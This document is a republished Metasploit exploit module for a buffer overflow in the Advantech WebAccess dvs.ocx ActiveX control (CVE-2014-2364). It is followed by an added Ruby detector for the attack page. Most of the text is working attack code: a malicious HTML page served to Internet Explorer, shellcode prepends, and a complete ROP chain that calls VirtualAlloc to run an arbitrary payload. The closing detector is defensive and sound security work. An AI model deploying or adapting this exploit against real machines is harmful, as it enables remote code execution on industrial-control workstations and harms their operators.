Advantech WebAccess dvs.ocx GetColor Buffer Overflow
Source: metasploit.com  Author: vazquez  Published: 2014-09-25
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::BrowserExploitServer
  
  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
      'Description'         => %q{
        This module exploits a buffer overflow vulnerability in Advantech WebAccess. The
        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
        sprintf can be reached with user controlled data through the GetColor function.
        This module has been tested successfully on Windows XP SP3 with IE6 and Windows
        7 SP1 with IE8 and IE9.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'          =>
        [
          ['CVE', '2014-2364'],
          ['ZDI', '14-255'],
          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
        ],
      'DefaultOptions'      =>
        {
          'Retries'              => false,
          'InitialAutoRunScript' => 'migrate -f'
        },
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => Msf::OperatingSystems::WINDOWS,
          :ua_name => /MSIE/i,
          :ua_ver  => lambda { |ver| Gem::Version.new(ver) <  Gem::Version.new('10') },
          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
          :method  => "GetColor"
        },
      'Payload'             =>
        {
          'Space'           => 1024,
          'DisableNops'     => true,
          'BadChars'        => "\x00\x0a\x0d\x5c",
          # Patch the stack to execute the decoder...
          'PrependEncoder'  => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
          # Fix the stack again, this time better :), before the payload
          # is executed.
          'Prepend'         => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
                               "\x83\xC0\x08"             + # add eax, byte 8
                               "\x8b\x20"                 + # mov esp, [eax]
                               "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000
        },
      'Platform'            => 'win',
      'Arch'                => ARCH_X86,
      'Targets'             =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'       => 0,
      'DisclosureDate'      => 'Jul 17 2014'))
  end
  
  def on_request_exploit(cli, request, target_info)
    print_status("Requested: #{request.uri}")
  
    content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
    EOS
  
    print_status("Sending #{self.name}")
    send_response_html(cli, content, {'Pragma' => 'no-cache'})
  end
  
  # Uses gadgets from ijl11.dll 1.1.2.16
  def rop_payload(code)
    xpl = rand_text_alphanumeric(61) # offset
    xpl << [0x60014185].pack("V")    # RET
    xpl << rand_text_alphanumeric(8)
  
    # EBX = dwSize (0x40)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdafc9].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    xpl << [0x60018084].pack("V") # POP EBP # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
    # EDX = flAllocationType (0x1000)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdbf89].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    # ECX = flProtect (0x40)
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    0x41.times do
      xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
    end
    # EAX = ptr to &VirtualAlloc()
    xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
    xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
    # EBP = POP (skip 4 bytes)
    xpl << [0x6002054b].pack("V") # POP EBP # RETN
    xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
    # ESI = ptr to JMP [EAX]
    xpl << [0x600181cc].pack("V") # POP ESI # RETN
    xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
    # EDI = ROP NOP (RETN)
    xpl << [0x60021ad1].pack("V") # POP EDI # RETN
    xpl << [0x60021ad2].pack("V") # ptr to &(retn)
    # ESP = lpAddress (automatic)
    # PUSHAD # RETN
    xpl << [0x60018399].pack("V") # PUSHAD # RETN
    xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
    xpl << code
  
    xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
    xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping
  
    xpl
  end
  
end
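As an added example that is not part of the Metasploit module or of the original page: a Ruby content check a defender could run over captured HTTP responses to flag pages that instantiate the dvs.ocx CLSID named in the module's BrowserRequirements and pass GetColor an oversized string literal. Only the CLSID and method name come from the module above; the length threshold, the function names and the sample pages are assumptions constructed for this example.

```ruby
# Added example (not from the module above): a content-inspection check
# that flags HTML instantiating the WebAccess dvs.ocx control and handing
# GetColor a string literal far longer than any colour value.

# CLSID and method name come from the module's BrowserRequirements.
DVS_CLSID = '5CE92A27-9F6A-11D2-9D3D-000001155641'.freeze

# The module's chain puts its return address 61 bytes into the argument;
# a genuine colour string is a few characters, so this threshold is an
# assumption with plenty of margin on both sides.
MAX_BENIGN_ARG_BYTES = 48

# DOM ids of <object> elements bound to the dvs.ocx CLSID (any attribute order).
def dvs_object_ids(html)
  html.scan(/<object\b[^>]*>/im).filter_map do |tag|
    next unless tag.match?(/classid\s*=\s*['"]?\s*clsid:#{DVS_CLSID}/i)
    tag[/\bid\s*=\s*['"]?([\w-]+)/i, 1]
  end
end

# One finding per GetColor call on a dvs.ocx object whose first argument
# is a string literal longer than MAX_BENIGN_ARG_BYTES.
def scan_getcolor_overflow(html)
  dvs_object_ids(html).flat_map do |id|
    # id.GetColor("...") where the literal may contain JS escapes (\" or \\).
    call = /\b#{Regexp.escape(id)}\s*\.\s*GetColor\s*\(\s*"((?:[^"\\]|\\.)*)"/m
    html.scan(call).filter_map do |(arg)|
      next if arg.bytesize <= MAX_BENIGN_ARG_BYTES
      { object_id: id, arg_bytes: arg.bytesize }
    end
  end
end

# Constructed sample pages for the demonstration.
BENIGN_PAGE = <<~HTML
  <object classid='clsid:#{DVS_CLSID}' id='dvs'></object>
  <script>dvs.GetColor("#00FF00", 0);</script>
HTML

SUSPICIOUS_PAGE = <<~HTML
  <object id="viewer" classid="clsid:#{DVS_CLSID}"></object>
  <script>viewer.GetColor("#{'A' * 200}", 0);</script>
HTML

if __FILE__ == $0
  p scan_getcolor_overflow(BENIGN_PAGE)     # no findings
  p scan_getcolor_overflow(SUSPICIOUS_PAGE) # one finding, arg_bytes 200
end
```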
